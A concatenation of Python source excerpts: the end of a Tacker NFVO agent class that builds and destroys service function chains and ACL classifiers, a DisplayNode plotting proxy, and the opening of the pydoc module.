logger.info("VNFFGD %s removed successfully!", vnffgd_id)
def create_vnffg(self, vnffgd_id, vnf_mapping, vnffg_name):
"""Create VNF Forwarding Graph.
:return: Tacker's VNFFG ID
Raises
------
NFVOAgentsException
"""
vnf_mapping = json.dumps(vnf_mapping)
try:
vnffg = self.tacker.vnffg_create(vnffgd_id, vnf_mapping, vnffg_name)
except NFVOAgentsException as e:
error_msg = 'Unable to instantiate VNFFG name %s: %s' % (vnffg_name, e.reason)
logger.error(error_msg)
raise NFVOAgentsException(ERROR, error_msg)
return vnffg['id']
def show_vnffg(self, vnffg_id):
"""Retrieves a given VNFFG in Tacker
Raises
------
NFVOAgentsException
"""
vnffg = self.tacker.vnffg_show(vnffg_id)
return vnffg
def vnffg_list(self):
"""Retrieves all VNFFGs from Tacker
ReRaises
------
NFVOAgentsException
"""
vnffgs = self.tacker.vnffg_list()
return vnffgs
def destroy_vnffg(self, vnffg_id):
"""Deletes a given VNFFG in Tacker
Raises
------
NFVOAgentsException
"""
try:
self.tacker.vnffg_delete(vnffg_id)
except NFVOAgentsException as e:
error_msg = 'Unable to destroy VNFFG id %s: %s' % (vnffg_id, e.reason)
logger.error(error_msg)
raise NFVOAgentsException(ERROR, error_msg)
logger.info("VNFFG %s destroyed successfully!", vnffg_id)
def list_sfcs(self):
"""Retrieves the list of SFCs in Tacker
:return: a list of VNFFGs with particular fields
Raises
------
NFVOAgentsException
"""
response = self.tacker.vnffg_list()
sfcs = self.tacker.sfc_list()
# Getting the VNF Chain of each NFP from all SFCs
nfps = {}
for sfc in sfcs:
vnf_chain = []
for vnf in sfc['chain']:
vnf_chain.append(vnf['name'])
nfps[sfc['nfp_id']] = vnf_chain
vnffgs = []
for vnffg in response:
vnffg_id = vnffg['id']
name = vnffg['name']
state = vnffg['status']
vnffgs.append({
'id': vnffg_id,
'name': name,
'status': state,
'vnf_chain': nfps[vnffg['forwarding_paths']],
'platform': TACKER_NFVO
})
return vnffgs
def get_fip_router_interface_id(self, net_name):
"""Retrieves Floating IP router network port ID
:param net_name: Network name to retrieve the router port ID (gateway)
:return: network_src_port_id
Raises
------
NFVOAgentsException
"""
vim_agent = self.get_vim_agent_instance()
try:
src_port_id = vim_agent.get_fip_router_interface(net_name)
except VIMAgentsException as e:
msg = "Router Floating IP interface not configured for network '%s'. %s" % (net_name, e.reason)
logger.error(msg)
raise NFVOAgentsException(ERROR, msg)
return src_port_id
def select_and_validate_cp_out(self, options_cp_out, vnf_pkg_cps, cp_in):
"""Selects and validates the CP_out based on Tacker NFVO requirements
Verify if there is another CP attached to subnet of cp_in. If not, return all CPs with OPTIONS reply.
If there are more than 1 CP attached to subnet of cp_in, return OPTIONS status and the suitable CPs
in order to the user select one of them as output CP.
It also verifies if cp_out has a value. If yes, validate if it is attached to the same net of cp_in.
OBS: Tacker/Pike does not work yet on SFCs using different subnets.
Therefore, each SFC must be composed in the same subnet.
:param options_cp_out: the output connection point
:param vnf_pkg_cps: a dict containing the vnf package connection points and its subnet names
:param cp_in: cp_in connection point name
:return: CP_out if validated
Raises
------
:NFVOAgentOptions: if it was not possible to select CP_out automatically
"""
cp_out = options_cp_out
# Leave just the CPs that are in the same subnet as CP_in (Tacker/Pike requirement)
cps = vnf_pkg_cps.keys()
cps = list(cps)
for cp in cps:
if vnf_pkg_cps[cp]['network_name'] != vnf_pkg_cps[cp_in]['network_name']:
vnf_pkg_cps.pop(cp)
# We are assuming that there are more than 1 CP using a same subnet. So, SFC_Core could not
# select cp_out automatically, and user must inform a CP_out.
if not options_cp_out:
# Case all other CPs are from other subnets, then there is only 1 CP available
if len(vnf_pkg_cps) == 1:
cp_out = cp_in
else:
# Tacker/Pike does not work with Input and Output CPs belonging to the same subnet
# return OPTIONS, {
# 'status': OPTIONS,
# 'reason': 'Inform the outgoing traffic CP',
# 'cp_list': vnf_pkg_cps
# }
cp_out = cp_in
else:
# vnf_pkg_cps will has here only the CPs which have the same subnet of CP_in
if options_cp_out not in vnf_pkg_cps:
raise NFVOAgentOptions('Invalid CP!', vnf_pkg_cps)
return cp_out
def get_available_policies(self):
"""Returns the Tacker classifier ACL"""
return {
'eth_type': 'Specifies Ethernet frame type (See IEEE 802.3)',
'eth_src': 'Ethernet source address',
'eth_dst': 'Ethernet destination address',
'vlan_id': 'VLAN ID',
'vlan_pcp': 'VLAN Priority',
'mpls_label': 'MPLS Label',
'mpls_tc': 'MPLS Traffic Class',
'ip_dscp': 'IP DSCP (6 bits in ToS field)',
'ip_ecn': 'IP ECN (2 bits in ToS field)',
'ip_src_prefix': 'IP source address prefix',
'ip_dst_prefix': 'IP destination address prefix',
'ip_proto': 'IP protocol number',
'tenant_id': 'OpenStack Tenant ID',
'icmpv4_type': 'ICMP type',
'icmpv4_code': 'ICMP code',
'arp_op': 'ARP opcode',
'arp_spa': 'ARP source ipv4 address',
'arp_tpa': 'ARP target ipv4 address',
'arp_sha': 'ARP source hardware address',
'arp_tha': 'ARP target hardware address',
'ipv6_src': 'IPv6 source address',
'ipv6_dst': 'IPv6 destination address',
'ipv6_flabel': 'IPv6 Flow Label',
'icmpv6_type': 'ICMPv6 type',
'icmpv6_code': 'ICMPv6 code',
'ipv6_nd_target': 'Target address for ND',
'ipv6_nd_sll': 'Source link-layer for ND',
'ipv6_nd_tll': 'Target link-layer for ND',
'destination_port_range': 'Target port range'
}
def get_sfc_template(self):
return {
"vnffgd": {
"name": "vnffgd1",
"template": {
"vnffgd": {
"tosca_definitions_version": "tosca_simple_profile_for_nfv_1_0_0",
"description": "Sample VNFFG template",
"topology_template": {
"node_templates": {
"Forwarding_path1": {
"type": "tosca.nodes.nfv.FP.TackerV2",
"description": "creates path (CP12->CP22)",
"properties": {
"policy": {
"type": "ACL",
"criteria": [
{
"name": "classifier1",
"classifier": {}
}
]
},
"path": [],
"id": 0
}
}
},
"description": "Sample VNFFG template",
"groups": {
"VNFFG1": {
"type": "tosca.groups.nfv.VNFFG",
"description": "HTTP to Corporate Net",
"members": [
"Forwarding_path1"
],
"properties": {
"vendor": "tacker",
"connection_point": [],
"version": 1.0,
"constituent_vnfs": [],
"number_of_endpoints": 0,
"dependent_virtual_link": []
}
}
}
}
}
}
}
}
def get_policies(self, sfc_descriptor):
"""Retrieves the configured policies in the sfc descriptor
:return: a list containing key:value elements
"""
topology_template = sfc_descriptor['vnffgd']['template']['vnffgd']['topology_template']
criteria = topology_template['node_templates']['Forwarding_path1']['properties']['policy']['criteria']
policies = []
for classifier in criteria:
policies.append(classifier['classifier'])
return policies
def get_sfc_input_security_policy_data(self, sfc_descriptor):
"""Retrieves security policy data required to configure security policies
:param sfc_descriptor:
:return: a list of dicts containing the IP protocol number, port_range_min, port_range_max
[{proto: 6, min_port: 80 , max_port: 80}]
"""
policies = self.get_policies(sfc_descriptor)
policy_data = []
for policy in policies:
data = {}
if 'ip_proto' in policy:
data['proto'] = policy['ip_proto']
if 'destination_port_range' in policy:
dst_range = policy['destination_port_range']
dst_range = dst_range.split(sep='-')
data['min_port'] = dst_range[0]
data['max_port'] = dst_range[1]
policy_data.append(data)
return policy_data
def list_vnf_pkg_cps(self, vnfp_dir):
"""Retrieve all connection points of a VNF Package stored in repository
:param vnfp_dir: VNF Package directory name
:return: a dict with all connection points
"""
vnfd_path = 'repository/%s/vnfd.json' % vnfp_dir
with open(vnfd_path) as vnfd_file:
vnfd_data = vnfd_file.read()
vnfd_data = json.loads(vnfd_data)
node_templates = vnfd_data['vnfd']['attributes']['vnfd']['topology_template']['node_templates']
cps = {}
for atr in node_templates.keys():
if 'tosca.nodes.nfv.CP' in node_templates[atr]['type']:
virtual_link = node_templates[atr]['requirements'][0]['virtualLink']['node']
network_name = node_templates[virtual_link]['properties']['network_name']
cps[atr] = {'virtual_link': virtual_link, 'network_name': network_name}
return cps
def compose_sfp(self, sfc_descriptor, vnfd_name, vnfp_dir, database, options_cp_out):
"""Performs VNF Chaining in the VNFFG Template.
This function stands for VNF Chaining and its requirements for CPs and VLs using the VNFFG Template.
The first interface is reserved for the VNF management interface, and thus it is not used for VNF chaining.
The following rules are taken into account:
:cp_in: chooses the cp_in according to the same network of the prior cp_out.
If the VNF is the first one, then the first CP is chosen (disregarding the management interface)
:cp_out: if the given VNF has just one CP for VNF chaining, then cp_out = cp_in.
If cp_out can not be selected automatically, a exception with OPTIONS status is raised
in order to the user inform the desirable and suitable connection point.
:param sfc_descriptor: the VNFFG descriptor being composed
:param vnfd_name:
:param vnfp_dir:
:param database:
:param options_cp_out: not required, but it can be used for manual choosing of cp_out
:return: the Tacker SFC Descriptor (i.e. VNFFGD) being composed
Raises
------
NFVOAgentsException
ReRaises
------
NFVOAgentOptions, DatabaseException
"""
vnf_pkg_cps = self.list_vnf_pkg_cps(vnfp_dir)
topology_template = sfc_descriptor['vnffgd']['template']['vnffgd']['topology_template']
# verifying if this vnf package was already added to this VNFFG (no duplication allowed)
if vnfd_name in topology_template['groups']['VNFFG1']['properties']['constituent_vnfs']:
raise NFVOAgentsException(ERROR, 'The selected VNF Package was already added in this SFC!')
cp_list = sorted(vnf_pkg_cps)
# we are considering that the Tacker's first CP is always reserved for the VNF management interface
# Thus, it is not used for VNF chaining
cp_list.pop(0)
# gets all virtual links in VNFFGD
vnffgd_vls = topology_template['groups']['VNFFG1']['properties']['dependent_virtual_link']
# getting the previous network_name for correct VNF chaining
previous_net_name = ''
if vnffgd_vls:
previous_vl = vnffgd_vls[-1] # gets the current last VL in VNFFG
# gets the current last VNF Name in VNFFGD
previous_vnfd_name = topology_template['groups']['VNFFG1']['properties']['constituent_vnfs'][-1]
previous_vnf_pkg = database.list_catalog(vnfd_name=previous_vnfd_name)
previous_vnfp_dir = previous_vnf_pkg[0]['dir_id']
# gets all connection points data from previous VNFD
previous_vnfd_cps = self.list_vnf_pkg_cps(previous_vnfp_dir)
for cp in previous_vnfd_cps:
if previous_vnfd_cps[cp]['virtual_link'] == previous_vl:
previous_net_name = previous_vnfd_cps[cp]['network_name']
break
cp_in, cp_out = "", ""
# including cp_input
for cp in cp_list:
if vnffgd_vls: # if there are previous Virtual Links included in VNFFGD
# cp_in is valid just if it is connected to the same network_name from previous VNF output
if vnf_pkg_cps[cp]['network_name'] == previous_net_name:
cp_in = cp
break
else: # if this VNF is the first one being included in VNFFGD
cp_in = cp
break
if not cp_in:
raise NFVOAgentsException(ERROR, 'There is no suitable CP for chaining with the previous VNF!')
# including cp_output
num_cps = len(cp_list)
if num_cps == 1:
cp_out = cp_in
else: # num_cps surely will be > 1, because previous return
# output CP requirements are dependent of NFVO capabilities, thus it was implemented in the related agent
cp_out = self.select_and_validate_cp_out(options_cp_out, vnf_pkg_cps, cp_in)
if cp_in == cp_out:
capability = [cp_in]
else:
capability = [cp_in, cp_out]
for cp in capability:
# including connection points
topology_template['groups']['VNFFG1']['properties']['connection_point'].append(cp)
# including dependent virtual links
virtual_link = vnf_pkg_cps[cp]['virtual_link']
# if virtual_link not in topology_template['groups']['VNFFG1']['properties']['dependent_virtual_link']:
topology_template['groups']['VNFFG1']['properties']['dependent_virtual_link'].append(virtual_link)
# including constituent VNFs
topology_template['groups']['VNFFG1']['properties']['constituent_vnfs'].append(vnfd_name)
vnf_end_points = len(capability)
if vnf_end_points == 1:
capability = capability[0]
else:
capability = ','.join(capability)
# including number of endpoints
topology_template['groups']['VNFFG1']['properties']['number_of_endpoints'] += vnf_end_points
# TODO we disabled sfc_encap since our VNFs are NSH-unaware (i.e. VNFs are receiving MPLS packets from OVS)
# As a result we are only creating SFCs using NSH-unaware VNFs. NSH-aware VNFs still need to be implemented
path = {"forwarder": vnfd_name,
"capability": capability,
"sfc_encap": False} # hard coded
# including VNF forwarding path
topology_template['node_templates']['Forwarding_path1']['properties']['path'].append(path)
return sfc_descriptor
def get_vnf_nfvo_resource_id(self, vnf_id, resource_name):
"""Retrieves the NFVO resource ID (such as VDU and CP) from from a particular VNF
:param vnf_id:
:param resource_name: the resource name to get the ID
Raises
------
NFVOAgentsException
"""
resources = self.list_vnf_nfvo_resources(vnf_id)
for resource in resources:
if resource['name'] == resource_name:
return resource['id']
raise NFVOAgentsException(ERROR, 'VNF Resource ID not found!')
def get_sfc_traffic_origin(self, core):
# fields defines which information should be shown dynamically by client applications
fields = [
{'id': 'ID'},
{'name': 'Name'},
{'instance': 'Instance Name'},
{'address': 'Mgmt Address'},
{'status': 'Status'},
{'platform': 'Platform'}
]
vnfs = self.list_vnfs()
src_vnfs = []
for vnf in vnfs:
src_vnf = {
'id': vnf.get('vnf_id'),
'name': vnf.get('vnf_name'),
'instance': vnf.get('instance_name'),
'address': vnf.get('mgmt_url'),
'status': vnf.get('vnf_status'),
'platform': TACKER_NFVO
}
src_vnfs.append(src_vnf)
return fields, src_vnfs
def configure_traffic_src_policy(self, sfc_descriptor, origin, src_id, cp_out, database):
"""
Includes ACL criteria according to INTERNAL or EXTERNAL traffic source
INTERNAL traffic is sourced from VNFs managed by NFVO, while EXTERNAL traffic is sourced from everything
out from NFVO networks.
This function also includes specific requirements to select the source port for Tacker.
Tacker has the requirement for 'network_source_port_id' in ACL criteria, which is included in VNFFGD
by this function.
One important rule is applied:
1. Tacker's network_name from the origin VNF CP must be the same as the input CP of the first VNF in the chain.
If there are more CPs than 1, then a message with status OPTIONS and a cp_list is replied to the
user to inform a desirable connection point.
:param sfc_descriptor:
:param origin: INTERNAL or EXTERNAL as in *utils module*
:param src_id: the Tacker's VNF ID of the VNF which generates the SFC incoming traffic
:param cp_out:
:param database:
:return: the VNFFGD being composed
Raises
------
NFVOAgentsException, NFVOAgentOptions
ReRaises
------
DatabaseException
"""
net_src_port_id = None
topology_template = sfc_descriptor['vnffgd']['template']['vnffgd']['topology_template']
# sfp = service function path
sfp_cps = topology_template['groups']['VNFFG1']['properties']['connection_point']
sfp_vnfs = topology_template['groups']['VNFFG1']['properties']['constituent_vnfs']
# network_src_port_id is a requirement for Tacker NFVO
criteria = topology_template['node_templates']['Forwarding_path1']['properties']['policy']['criteria']
catalog = database.list_catalog(vnfd_name=sfp_vnfs[0])
sfp_first_pkg_dir_id = catalog[0]['dir_id']
sfp_first_vnf_cps = self.list_vnf_pkg_cps(sfp_first_pkg_dir_id)
if origin == INTERNAL:
data = database.list_vnf_instances(vnf_id=src_id)
# Only VNFs instantiated by this framework can be used as origin,
# as we need get information of its CP on VNF Packages
if not data:
raise NFVOAgentsException(ERROR, 'The chosen VNF was not instantiated by this framework!')
vnf_pkg_id = data[0]['vnf_pkg_id']
catalog = database.list_catalog(vnf_pkg_id=vnf_pkg_id)
vnf_pkg_dir = catalog[0]['dir_id']
vnf_pkg_cps = self.list_vnf_pkg_cps(vnf_pkg_dir)
# Leave just the CPs that are in the same subnet of the first VNF CP_in of the SFC
cps = vnf_pkg_cps.keys()
cps = list(cps)
for cp in cps:
if vnf_pkg_cps[cp]['network_name'] != sfp_first_vnf_cps[sfp_cps[0]]['network_name']:
vnf_pkg_cps.pop(cp)
if cp_out is None:
# Selects the suitable CP_out automatically
if not vnf_pkg_cps:
raise NFVOAgentsException(ERROR, 'No suitable CP on this VNF!')
if len(vnf_pkg_cps) == 1:
cp_name = list(vnf_pkg_cps.keys())[0]
else:
raise NFVOAgentOptions('Choose an CP!', vnf_pkg_cps)
else:
cp_name = cp_out
if cp_name not in vnf_pkg_cps:
raise NFVOAgentsException(ERROR, 'Invalid CP!')
net_src_port_id = self.get_vnf_nfvo_resource_id(src_id, cp_name)
elif origin == EXTERNAL:
net_src_port_id = self.get_fip_router_interface_id(sfp_first_vnf_cps[sfp_cps[0]]['network_name'])
else:
raise NFVOAgentsException(ERROR, 'SFC network traffic should be INTERNAL or EXTERNAL.')
if not net_src_port_id:
logger.error('Unable to get a value for network_src_port_id')
raise NFVOAgentsException(ERROR, 'Unable to get the source port id to configure the SFC classifier')
# currently multi-sfc uses only one network_src_port_id for all classifiers (the same)
# the configure_policies gets this value and uses for all subsequent classifiers
for classifier in criteria:
classifier['classifier']['network_src_port_id'] = net_src_port_id
return sfc_descriptor
def acl_criteria_parser(self, acl):
"""Parses all ACL criteria according of Tacker NFVO requirements.
It parses from strings to ints all ACL criteria to match the NFVO requirements.
:param acl: a dict with the acl criteria
:return: a dict with the parsed acl criteria
Raises
------
NFVOAgentsException
"""
with open('tacker_nfv_defs.yaml', 'r') as defs_file:
acl_defs = defs_file.read()
acl_defs = yaml.full_load(acl_defs)
acl_types = acl_defs['data_types']['tosca.nfv.datatypes.aclType']['properties']
tmp_acl = acl.copy()
for k, v in tmp_acl.items():
if k not in acl_types:
msg = 'Invalid ACL criteria "%s"!' % k
logger.error(msg)
raise NFVOAgentsException(ERROR, msg)
if 'constraints' in acl_types[k]:
item_range = acl_types[k]['constraints'][0]['in_range']
start, end = item_range
if int(v) not in range(start, end+1):
msg = "Invalid value for ACL criteria '%s'! Use a value between %s and %s." % (k, start, end)
logger.error(msg)
raise NFVOAgentsException(ERROR, msg)
if acl_types[k]['type'] == 'integer':
acl[k] = int(v)
return acl
def configure_policies(self, sfc_descriptor, policies):
"""Configure ACL rules for all Tacker SFC classifiers"""
topology_template = sfc_descriptor['vnffgd']['template']['vnffgd']['topology_template']
criteria = topology_template['node_templates']['Forwarding_path1']['properties']['policy']['criteria']
net_src_port_id = criteria[0]['classifier'].get('network_src_port_id')
criteria.clear() # remove the partial data of the first classifier to build all of them in one shot (simplify)
for acl in policies: # acl is the content of a policy
acl = self.acl_criteria_parser(acl)
acl['network_src_port_id'] = net_src_port_id
classifier = {
"classifier": acl
# classifier unique name is configured in create_sfc function, since the SFC name is required
# "name": ""
}
criteria.append(classifier)
return sfc_descriptor
def set_next_vnffgd_path_id(self, vnffgd):
"""Set up the next VNFFGD SFP id in the SFC being composed
Retrieves the largest number of the SFP ID in the vnffgd catalog from the NFVO and sets
the next one in the currently vnffgd being composed.
:return: the vnffgd begin composed
ReRaises
------
NFVOAgentsException
"""
data = self.list_vnffgds()
last_path_id = 0
for item in data:
path_id = item['template']['vnffgd']['topology_template'][
'node_templates']['Forwarding_path1']['properties']['id']
if path_id > last_path_id:
last_path_id = path_id
vnffgd['vnffgd']['template']['vnffgd']['topology_template'][
'node_templates']['Forwarding_path1']['properties']['id'] = last_path_id + 1
return vnffgd
def destroy_sfc_actions(self, destroy_vnf_fn, vnf_instance_ids=None, vnffgd_id=None, vnffg_id=None):
"""Executes the required actions do destroy an SFC
This function can be employed on a regular workflow to destroy SFCs, and on rollback actions due to
errors while creating an SFC
:param destroy_vnf_fn: callback function from the core module
:param vnf_instance_ids: a list of vnf instance ids to destroy, only required if vnffg_id is None
:param vnffgd_id: the vnffg descriptor id to remove, only required if vnffg_id is None
:param vnffg_id: the vnffg id to remove, if any
Raises
------
NFVOAgentsException
ReRaises
------
NFVOAgentsException
"""
vnffg_vnfs = [] # list of vnf ids to destroy
if vnffg_id:
data = self.show_vnffg(vnffg_id)
vnffgd_id = data['vnffgd_id']
vnf_mapping = data['vnf_mapping']
for vnf_id in vnf_mapping.values():
vnffg_vnfs.append(vnf_id)
# destroying VNFFG
self.destroy_vnffg(vnffg_id)
# How many time should we wait before remove the VNFFGD?
time.sleep(2)
# destroying VNFFGD
if vnffgd_id: # we need to check since rollback action might not have passed this argument
self.delete_vnffgd(vnffgd_id)
if vnf_instance_ids and not vnffg_vnfs: # we only use value of vnf_instance_ids on rollback actions
vnffg_vnfs = vnf_instance_ids
# destroying all VNFs and VNFDs using threads, I/O bound, no GLI problem
workers = []
queue = Queue() # queue to get return values from threads
for vnf_id in vnffg_vnfs:
t = Thread(target=destroy_vnf_fn, args=(vnf_id, queue))
t.start()
workers.append(t)
for w in workers: # waiting all threads to finish
w.join()
logger.debug('Returned data from threads: %s', list(queue.queue))
message = ''
while not queue.empty():
vnf_data = queue.get()
if vnf_data['status'] != OK:
message = ''.join([message, vnf_data['reason'], ' '])
queue.task_done()
# Threads to destroy VNFs up to here!!!
if message:
raise NFVOAgentsException(ERROR, message)
def create_sfc(self, sfc_descriptor, database, sfc_uuid, sfc_name, create_vnf_fn, destroy_vnf_fn):
"""Sends and instantiates all VNFDs and VNFFGDs to the Tacker NFVO
If an error occurs it also calls rollback actions
:param sfc_descriptor: the VNFFGD to be instantiated
:param database:
:param sfc_uuid: the unique identifier of the composed SFC to be started
:param sfc_name: the name of the SFC being instantiated (optional)
:param create_vnf_fn: callback function from the core module
:param destroy_vnf_fn: callback function from the core module
:return: a dict containing:
- a list of *vnf_instances* of the created SFC
- the created *vnffgd_id*
- the created *vnffg_id*
Raises
------
NFVOAgentsException
ReRaises
------
NFVOAgentsException, DatabaseException
"""
vnffgd_list = self.list_vnffgds()
vnffg_list = self.vnffg_list()
vnffgds = [x for x in vnffgd_list if x['name'] == sfc_name]
vnffgs = [x for x in vnffg_list if x['name'] == sfc_name]
if vnffgds or vnffgs:
raise NFVOAgentsException(ERROR, "SFC name '%s' already exists" % sfc_name)
vnf_instance_list = []
vnf_mapping = {}
topology_template = sfc_descriptor['vnffgd']['template']['vnffgd']['topology_template']
constituent_vnfs = topology_template['groups']['VNFFG1']['properties']['constituent_vnfs']
# configuring VNFFGD unique name
sfc_descriptor['vnffgd']['name'] = sfc_name
# configuring classifiers human readable unique names
criteria = topology_template['node_templates']['Forwarding_path1']['properties']['policy']['criteria']
for index, classifier in enumerate(criteria, start=1):
classifier['name'] = sfc_name + '-classifier{}'.format(index)
# Instantiating all VNFDs in VNFFGD using threads, I/O bound, no GLI problem
workers = []
queue = Queue() # queue to get return values from thread
pkgs = [] # packages to be instantiated
for vnfd_name in constituent_vnfs:
data = database.list_catalog(vnfd_name=vnfd_name)
vnfp_data = {
'vnfp_id': data[0]['_id'],
'domain_id': self.domain_id,
'nfvo_id': self.nfvo_id
}
pkgs.append(vnfp_data)
for pkg in pkgs:
t = Thread(target=create_vnf_fn, args=(pkg, queue))
t.start()
workers.append(t)
for w in workers: # waiting all threads to finish
w.join()
logger.debug('Returned data from threads: %s', list(queue.queue))
error = False
while not queue.empty():
vnf_data = queue.get()
if vnf_data['status'] == OK:
# vnf_instance_list.append(vnf_data['vnf_id'])
vnfd_name = vnf_data['vnfd_name']
vnf_mapping[vnfd_name] = vnf_data['vnf_id']
else:
logger.error("VNF could not be instantiated. Reason: %s", vnf_data['reason'])
error = True
queue.task_done()
# Threads to instantiate VNFs up to here!!!
# VNF instance list needs to be ordered according to the VNFFGD to avoid errors on instantiating tunnels
# This is required because this version of Tacker agent instantiates VNFFGs using threads instead of
# using a single call to create a NS from a NSD
for vnfd_name in constituent_vnfs:
vnf_instance_list.append(vnf_mapping[vnfd_name])
# Rollback action if a given VNF fails on instantiating
if error:
logger.info("Executing rollback actions...")
self.destroy_sfc_actions(destroy_vnf_fn, vnf_instance_list)
logger.info('Rollback done!')
raise NFVOAgentsException(ERROR, 'Something went wrong on instantiating VNFs. See server logs.')
vnffgd_id = None
try:
# incrementing SFP path_id number in VNFFGD
# Consider put the set_next_vnffgd_path_id() in a CRITICAL REGION to avoid condition racing
sfc_descriptor = self.set_next_vnffgd_path_id(sfc_descriptor)
# show the ultimate created VNFFGD
logger.info('SFC Template UUID: %s\n%s', sfc_uuid,
self.dump_sfc_descriptor(sfc_descriptor))
# create VNFFGD in NFVO
vnffgd_id = self.create_vnffgd(sfc_descriptor)
# Critical Region up to here
logger.info("SFC descriptor created with id %s", vnffgd_id)
# instantiate VNFFG
vnffg_id = self.create_vnffg(vnffgd_id, vnf_mapping, sfc_name)
# Rollback actions
except NFVOAgentsException as e:
logger.error('Unable to instantiate SFC: %s', e.reason)
try:
logger.info("Executing rollback actions...")
self.destroy_sfc_actions(destroy_vnf_fn, vnf_instance_list, vnffgd_id)
logger.info('Rollback done!')
except NFVOAgentsException as ex:
logger.error('Unable to execute rollback actions: %s', ex.reason)
message = ' '.join([e.reason, 'Rollback:', ex.reason])
raise NFVOAgentsException(ERROR, message)
raise
return {
'vnf_instances': vnf_instance_list,
'nsd_id': vnffgd_id,
'ns_id': vnffg_id
}
def destroy_sfc(self, sfc_id, destroy_vnf_fn):
"""Destroy the VNFFG and its VNFs
This function destroys the VNFFG and its VNFFGDs, and also all the VNFs and its VNFDs
that are specified in the VNFFG
:param sfc_id: the NFVO unique identifier of the VNFFG
:param destroy_vnf_fn: callback function from the core module
Raises
------
NFVOAgentsException
ReRaises
------
NFVOAgentsException
"""
try:
self.destroy_sfc_actions(destroy_vnf_fn, vnffg_id=sfc_id)
except NFVOAgentsException as e:
logger.error('Unable to destroy SFC %s, reason: %s', sfc_id, e.reason)
raise
def dump_sfc_descriptor(self, sfc_descriptor):
return json.dumps(sfc_descriptor, indent=2, sort_keys=True)
|
DisplayNodeProxy.py |
# Display Node - Python and Javascript plotting and data visualisation.
# Stefano Pedemonte
# Aalto University, School of Science, Helsinki
# 20 Oct 2013, Helsinki
from DisplayNodeServer import DisplayNodeServer
from DisplayNodeServer import PROXY_ADDRESS,PROXY_PORT,WEB_ADDRESS,WEB_PORT
from xmlrpclib import Server, Binary
import webbrowser
import sys
import socket
from StringIO import StringIO
from PIL import Image
try:
import Image as IM
except:
IM=Image
import platform
#if platform.system() == "Linux":
if 0:
from multiprocessing import Process
import signal
USE_MULTIPROCESSING = True
else:
import thread
USE_MULTIPROCESSING = False
WIDTH = '900' #'900' #FIXME: obtain display specific width and height form the server
HEIGHT = '450'
socket.setdefaulttimeout(60)
class ParameterError(Exception):
def __init__(self,msg):
self.msg = str(msg)
def __str__(self):
return "Unexpected parameter: %s"%(self.msg)
def is_an_image(im):
is_image = False
if isinstance(im,Image.Image) or isinstance(im,IM.Image):
is_image=True
return is_image
class DisplayNode():
def __init__(self,proxy_address=(PROXY_ADDRESS,PROXY_PORT), web_address=(WEB_ADDRESS,WEB_PORT)):
self._proxy = Server('http://%s:%s'%proxy_address,allow_none=True)
# print "Proxy: ",proxy_address
self.start_server(proxy_address,web_address)
self.data = None
self.type = None
self.url = None
self.width = 0
self.height = 0
# FIXME: use introspection to define the methods (for autocompletion)
def start_server(self,proxy_address,web_address):
if not self.is_server_responding():
self._server = DisplayNodeServer(proxy_address,web_address)
if USE_MULTIPROCESSING:
#print "Multiprocessing version! "
self._server_process = Process( target=self.__run_server_forever, args=() )
self._server_process.start()
else:
thread.start_new_thread( self.__run_server_forever, () )
def __run_server_forever(self):
if USE_MULTIPROCESSING:
signal.signal(signal.SIGINT, self.__signal_handler_interrupt)
self._server.serve_forever()
def __signal_handler_interrupt(self, signal, frame):
print 'Shutting down DisplayNode server. '
sys.exit(0)
def is_server_responding(self):
socket.setdefaulttimeout(2)
try:
alive = self._proxy.is_alive(1)
except:
alive = False
socket.setdefaulttimeout(60)
return alive
def display(self,content_type,data={},open_browser=False,new_tab=True,autoraise=False):
# if image: send png content
if content_type=="image":
buf = StringIO()
data.convert("RGB").save(buf,format="png")
data = Binary(buf.getvalue())
buf.close()
# if list of images: send list of png content
if content_type=="tipix":
if not type(data)==list:
raise ParameterError("Parameter for 'tipix' must be a list of images.")
# 1D array of images:
if is_an_image(data[0]):
for i in range(len(data)):
if not is_an_image(data[i]):
raise ParameterError("Parameter for 'tipix' must be a list of images.")
buf = StringIO()
data[i].convert("RGB").save(buf,format="png")
data[i] = Binary(buf.getvalue())
buf.close()
elif type(data[0])==list:
for i in range(len(data)):
for j in range(len(data[i])):
if not is_an_image(data[i][j]):
raise ParameterError("Parameter for 'tipix' must be a list of images.")
buf = StringIO()
data[i][j].convert("RGB").save(buf,format="png")
data[i][j] = Binary(buf.getvalue())
buf.close()
url = self._proxy.display({'type':content_type,'data':data})
if open_browser:
if new_tab:
webbrowser.open_new_tab(url)
else:
webbrowser.open(url,autoraise=autoraise)
self.data = data
self.type = content_type
self.url = url
self.width = WIDTH #FIXME: obtain width and height from the server
self.height = HEIGHT
return self
def display_in_browser(self,content_type,data={},new_tab=False,autoraise=False):
self.display(content_type,data,open_browser=True,new_tab=new_tab,autoraise=autoraise)
return None
def _repr_html_(self):
# This method is for ipython notebook integration through Rich Display
return '<iframe src=%s width=%s height=%s frameborder=0></iframe>'%(self.url,self.width,self.height)
|
pydoc.py | #!/usr/bin/env python
# -*- coding: latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision$"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
